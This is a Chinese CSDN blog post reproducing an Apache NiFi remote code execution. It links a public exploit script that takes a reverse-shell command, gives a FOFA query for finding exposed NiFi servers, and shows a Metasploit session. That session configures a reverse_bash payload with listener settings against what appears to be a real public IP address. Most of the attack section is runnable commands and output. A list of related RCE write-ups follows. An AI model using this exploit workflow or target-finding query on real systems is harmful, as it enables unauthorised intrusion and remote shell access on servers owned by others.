Apache NiFi远程代码执行-RCE

最新推荐文章于 2024-01-31 11:40:32 发布
最新推荐文章于 2024-01-31 11:40:32 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: 复现 文章标签: 漏洞复现 Apache NiFi-RCE Apache NiFi复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/T780000063/article/details/111054304
版权

Apache NiFi远程代码执行-RCE

简介:
Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。

EXP:https://github.com/imjdl/Apache-NiFi-Api-RCE作者这里使用exp不行
使用方法:python exp.py [url] [反弹shell命令]

MSF module:

https://github.com/rapid7/metasploit-framework/pull/14216#issue-497270261

我这里直接跳过了安装,我直接更新msf完事:

apt-get update
apt-get  install metasploit-framework

fofa关键字:"nifi" && title=="NiFi"

MSF怼:

msf6 > use exploit/multi/http/apache_nifi_processor_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rhosts 目标ip
rhosts => 74.208.80.242
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rport 目标端口
rport => 9090
msf6 exploit(multi/http/apache_nifi_processor_rce) > run -z


[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L9vVy4re-1607695790801)(https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607693967_20201211213914774_24928.png)]

Birdman-one
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache NiFi API远程代码执行复现
玄道的网安博客
12-07 2716
简介 一个易用、强大、可靠的数据处理与分发系统。基于Web图形界面,通过拖拽、连接、配置完成基于流程的编程,实现数据采集等功能 环境搭建 进入目录 cd nifi-1.12.1/bin/ ./nifi.sh 先执行一下试试,可以看到启动、停止、执行、重启、状态、dump、诊断、安装(为系统服务)、无状态 ./nifi.sh start 执行启动命令,删除了“java home”和“nifi home”,启动配置文件为“conf/bootstrap...
CVE-2023-34468漏洞复现Apache NiFi远程代码执行
最新发布
2302_77759960的博客
07-22 659
简要介绍了CVE-2023-34468的漏洞利用过程
Apache NiFi远程代码执行(CVE-2023-34468)
m0_65150886的博客
01-31 531
Apache NiFi
Apache NiFi API RCE 复现
weixin_51345872的博客
09-01 2757
仅供学习参考使用,任何违法事情与本人无关。
8、NIFI综合应用场景-NiFi监控MySQL binlog进行实时同步到hive
05-29
Apache NiFi是一款强大的数据流处理工具,常用于构建复杂的数据集成解决方案。在本场景中,我们将探讨如何使用NiFi来实时监控MySQL数据库的binlog(二进制日志),并将其中的变更事件同步到Hive数据仓库。由于Hive的...
9、NIFI综合应用场景-通过NIFI配置kafka的数据同步
05-29
你可以通过Kafka提供的命令行工具或第三方工具(如在示例中提到的http://server1:8048/topic/meta/nifi-kafka/)来监控和验证数据是否成功发送到Kafka,并被消费者正确消费。 总结来说,Nifi与Kafka的集成为ETL...
nifi-1.19.1-bin.part1.rar
04-26
Apache NiFinifi-1.19.1-bin.zip、nifi-toolkit-1.19.1-bin.zip)是一个易于使用、功能强大而且可靠的数据拉取、数据处理和分发系统。文件使用WinRAR分割两个压缩包,必须一起下载使用: Apache NiFinifi-...
7、NIFI综合应用场景-将mysql查询出的json数据转换成txt后存储至HDFS中
05-29
Apache NiFi是一个强大的数据处理和自动化工具,常用于构建数据集成流程。在本文中,我们将探讨一个具体的NIFI应用场景,即如何将从MySQL数据库中查询得到的JSON数据转换成TXT格式,并存储到HDFS(Hadoop分布式文件...
Apache-RCE、目录遍历漏洞、文件解析
weixin_68408599的博客
12-21 1309
Apache HTTP Server 2.4.49、2.4.50 版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到 Web 目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。Apache HTTPD 是一款 HTTP 服务器。其 2.4.0~2.4.29 版本存在一个解析漏洞,在解析 PHP 时,1.php\x0A 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策略。
Apache Log4j2 RCE(CVE-2021-44228)
weixin_60329395的博客
11-12 1299
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将**用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行(RCE)
漏洞复现-Apache-目录穿越文件读取-RCE】vulfocus/apache(cve_2021_41773)
10-07 2199
Apache-目录穿越文件读取-RCE
Apache Druid RCE(CVE-2021-25646)复现
玄道的网安博客
02-02 3652
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 影响版本 Apache Druid < 0.20.1 环境搭建 这里使用docker来搭建 拉取镜像并启动Apache Druid:0.16.0版本的环境 docker pull fokkodrie...
Apache HTTPd路径穿越及RCE
吾所在处,即为净土
05-12 226
困难、痛苦、挫折总是接踵而至,这正是世间的常理。要是输了,就只能说明我不过是如此程度的男人。
漏洞预警:Apache Log4j RCE漏洞
热门推荐
weixin_43526443的博客
12-13 7万+
目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 漏洞检测 自我检测 攻击检测 产品检测 Part6 漏洞修复 Part1 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 近日发现Apache Log4j存在任意代码执行
网络安全深入学习第五课——热门框架漏洞RCEApache Shiro 1.2.4反序列化漏洞
p36273的博客
09-18 865
----- 当程序在进行反序列化时,会自动调用一些函数,以PHP为例有__wakeup()、__destruct()等函数,Java中有readObject()方法等等,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。------ Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。
Apache Httpd 路径穿越以及RCE漏洞排查
dayouzi的博客
08-15 338
2021年10月6日Apache HTTPd官方发布安全更新,披露了CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。在其2.4.49版本中,引入了一个路径穿越漏洞。在路径穿越目录允许被访问的的情况下,例如配置了 Require all granted,攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。
正排索引和倒排索引
岁月静好
09-23 3万+
正排索引(正向索引) 正排表是以文档的ID为关键字,表中记录文档中每个字的位置信息,查找时扫描表中每个文档中字的信息直到找出所有包含查询关键字的文档。 正排表结构如图1所示,这种组织方法在建立索引的时候结构比较简单,建立比较方便且易于维护;因为索引是基于文档建立的,若是有新的文档加入,直接为该文档建立一个新的索引块,挂接在原来索引文件的后面。若是有文档删除,则直接找到该文档号文档对应的索引信息
Apache NIFI集群部署实战:Zero-Master模式与节点管理
尽管没有在描述中明确提到,但NiFi也支持主从结构的集群部署,其中有一个主节点负责全局决策和协调,其余节点作为工作节点执行任务。这种方式更适用于需要集中控制和决策的场景。 **节点管理**涉及到集群中各个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值